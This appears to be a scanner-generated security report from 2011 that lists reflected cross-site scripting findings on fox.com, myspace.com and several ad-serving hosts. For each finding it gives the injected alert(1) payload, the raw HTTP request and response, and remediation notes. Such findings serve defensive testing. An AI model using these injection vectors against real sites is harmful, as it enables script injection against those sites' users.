The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59c29"-alert(1)-"8064487c9c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/js59c29"-alert(1)-"8064487c9c1/fox_homepage_vars.php?date= HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.106 Content-Type: text/html; charset=utf-8 Content-Length: 22171 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:59:03 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29dad"-alert(1)-"706770c3e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cf38"-alert(1)-"fad2b22c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7064e"-alert(1)-"1ed04ee39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f89"-alert(1)-"65f4a9e9c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40491"-alert(1)-"e6bb8e09af1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df3ec"-alert(1)-"0fcc499bca2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda49"-alert(1)-"7795fd16c1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faffe"-alert(1)-"cfa0ec82037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a2c"-alert(1)-"7fdab8ea2b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.114 Content-Type: text/html; charset=utf-8 Content-Length: 22241 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 23:09:39 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOX Broadcastin ...[SNIP]... //Site Sub - Section s_analytics.prop8="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playe" //Site Sub-Section 2 s_analytics.prop9="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playerswf18a2c"-alert(1)-"7fdab8ea2b0" s_analytics.prop15="sub section:flvplayer" //Content Type s_analytics.prop17="" //Campaign s_analytics.prop35="" //Content Title s_analytics.prop36="" s_analytics.prop42 = (s_analytics.get ...[SNIP]...
2.240. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myspace.com
Path:
/search/people
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfacc"><script>alert(1)</script>3db7b7228e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2e0a6<script>alert(1)</script>985c8e5e0e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback2e0a6<script>alert(1)</script>985c8e5e0e4 HTTP/1.1 Host: www.nbcudigitaladops.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 146 Content-Type: application/javascript ETag: "15f491-44-4aacd3f4ef780" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Expires: Sun, 02 Oct 2011 23:03:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 02 Oct 2011 23:03:12 GMT Connection: close
The value of the skin request parameter is copied into the HTML document as plain text between tags. The payload 96d92<x%20style%3dx%3aexpression(alert(1))>72b3095c178 was submitted in the skin parameter. This input was echoed as 96d92<x style=x:expression(alert(1))>72b3095c178 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload db02a(a)c1b3025bd21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ed53(a)70df5e1988a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62de1(a)a00d971dc5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2b70(a)d5aa542911d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 596b2(a)64259b478de was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 17e4a(a)9c3055125a6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 251a5(a)027fb17edd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0bcd(a)8afefe14983 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2510'-alert(1)-'c3b5e79b045 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Sun, 02 Oct 2011 22:54:54 GMT Content-Length: 597
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d598"-alert(1)-"8cbd1ea9ede was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.google.com/search?hl=en&q=2d598"-alert(1)-"8cbd1ea9ede Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0F63AD242202D43D833854E83C53A58A; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a853f"-alert(1)-"bbeb9762c7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.google.com/search?hl=en&q=a853f"-alert(1)-"bbeb9762c7e Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1E2429F5EBFB2A940BD072BC0FC6AB6C; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3d11"-alert(1)-"2f4ef636518 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.255. http://myspace.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://myspace.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6f4"><script>alert(1)</script>9fe1e812605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?ed6f4"><script>alert(1)</script>9fe1e812605=1 HTTP/1.1 Host: myspace.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/?ed6f4"><script>alert(1)</script>9fe1e812605=1">here</a>.</h2></body></html>
The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload b4152<script>alert(1)</script>0a720ee56a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b68"><img%20src%3da%20onerror%3dalert(1)>6278c58b71f was submitted in the REST URL parameter 4. This input was echoed as 76b68"><img src=a onerror=alert(1)>6278c58b71f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1509a'%3b7c5462401ec was submitted in the REST URL parameter 4. This input was echoed as 1509a';7c5462401ec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.